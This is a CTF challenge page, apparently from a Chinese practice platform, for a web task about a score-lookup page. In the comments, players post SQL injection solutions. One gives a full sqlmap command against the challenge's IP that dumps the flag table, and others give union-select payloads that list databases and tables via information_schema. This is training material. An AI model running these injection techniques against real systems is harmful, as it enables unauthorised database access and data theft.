成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 12518
提  示:
描  述:
来源山科大ctf
评论
EtHat 2年前

sqlmap一把梭哈

回复 0

blackjack009 2年前

python sqlmap.py -u http://114.67.175.224:11724/index.php --random-agent --dbms mysql --data="id=1" -p id -v 6 -T fl4g --dump

回复 0

18946551925 2年前

为什么一注入就连接已重置啊??????烦死了,差哪呢?

回复 1

xiaohaisec 2年前

1'报错 1"不报错,所以使用' 查询数据表 -1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# sc fl4g 查询表的字段名 -1' union select 1,databa

回复 0

n0pass 2年前

启动环境以后网页打不开啊。。。。。。退钱

回复 0
harry 管理员 2年前

已修复,金币退了

回复 2

老渡真的不懂 2年前

环境有点问题,有时能用有时不能用。试了一下passwd,group,php.ini能看,像我这样的菜鸟也就看看,做不了什么,大神恐怕随随便便就能破坏环境,感觉权限给高了。环境总出问题不会是大佬进去搞破坏了吧?

回复 1

samRsa 2年前

这题也太简单了

回复 0

逐月 2年前

一尝试注入就链接被重置,我真的被气得头疼

回复 1

逐月 2年前

烦死了烦死了一sql注入就页面一直转,然后链接被中断,这是在干什么。。

回复 1

ls666 2年前

首先爆库名:通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag; 然后爆表:通过使用 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc

回复 1
xiashuidao 2年前

id=-1‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()-- -

回复 1

WriteUp

image
harry

2 金币

评分(25)

解题动态

zrlht 攻破了该题 13小时前
cykai999 攻破了该题 17小时前
小韩极客 攻破了该题 1天前
socratesx 攻破了该题 1天前
abc114514 攻破了该题 1天前
托尼二又二 攻破了该题 1天前
Anos 攻破了该题 1天前
EchoOfCloud 攻破了该题 1天前
majixikuwa 攻破了该题 1天前
五彩星云 攻破了该题 2天前
多米今天犯错了没 攻破了该题 2天前
sysgetshell 攻破了该题 2天前
倚楼叹世间 攻破了该题 2天前
hh_lll 攻破了该题 2天前
ciphercici 攻破了该题 2天前
18744838346 攻破了该题 2天前
霸气薛少 攻破了该题 4天前
苦味的辣条 攻破了该题 4天前
FreedomBK 攻破了该题 4天前
snow 攻破了该题 4天前
问题反馈